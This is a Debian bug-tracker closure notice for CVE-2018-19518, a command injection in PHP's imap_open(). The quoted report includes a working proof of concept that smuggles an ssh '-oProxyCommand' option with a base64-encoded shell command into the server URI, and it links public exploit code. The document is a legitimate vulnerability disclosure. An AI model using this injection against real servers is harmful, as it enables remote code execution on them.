Your message dated Wed, 12 Dec 2018 14:42:14 +0200 with message-id <20181212124214.GC31069@localhost> and subject line php7.2 has been removed from unstable has caused the Debian Bug report #913835, regarding php7.2-imap: CVE-2018-19518: imap_open() function command injection to be marked as done.
This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 913835: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=913835 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems
--- Begin Message ---Package: php-imap Version: 1:7.0+49 Severity: grave Tags: security Justification: user security hole Dear Maintainer, A command injection vulnerability has been identified in the imap extension of php. It is located in the imap_open() function which does not validate correctly the server URI. imap_open() invokes rsh which is symlinked to ssh on Debian, it results in a possible command injection via the "-o ProxyCommand" option of ssh. A PoC is available : ``` <?php # https://antichat.com/threads/463395/#post-4254681 # echo '1234567890'>/tmp/test0001 $server = "x -oProxyCommand=echo\tZWNobyAnMTIzNDU2Nzg5MCc+L3RtcC90ZXN0MDAwMQo=|base64\t-d|sh}"; imap_open('{'.$server.':143/imap}INBOX', '', '') or die("\n\nError: ".imap_last_error()); ``` - Bo0om : PHP_imap_open_exploit https://github.com/Bo0oM/PHP_imap_open_exploit/blob/master/exploit.php - Antichat : [спущено с LVL8] RCE Task #3 https://antichat.com/threads/463395/#post-4254681 -- System Information: Debian Release: 9.5 APT prefers stable-updates APT policy: (500, 'stable-updates'), (500, 'stable') Architecture: amd64 (x86_64) Foreign Architectures: i386 Kernel: Linux 4.9.0-8-amd64 (SMP w/4 CPU cores) Locale: LANG=en_US.utf8, LC_CTYPE=en_US.utf8 (charmap=UTF-8), LANGUAGE=en_US:en (charmap=UTF-8) Shell: /bin/sh linked to /bin/dash Init: systemd (via /run/systemd/system) Versions of packages php-imap depends on: ii php-common 1:49 ii php7.0-imap 7.0.30-0+deb9u1 php-imap recommends no packages. php-imap suggests no packages. -- no debconf information
--- End Message ---
--- Begin Message ---php7.2 has been removed from unstable, see #911673. cu Adrian -- "Is there not promise of rain?" Ling Tan asked suddenly out of the darkness. There had been need of rain for many days. "Only a promise," Lao Er said. Pearl S. Buck - Dragon Seed
--- End Message ---
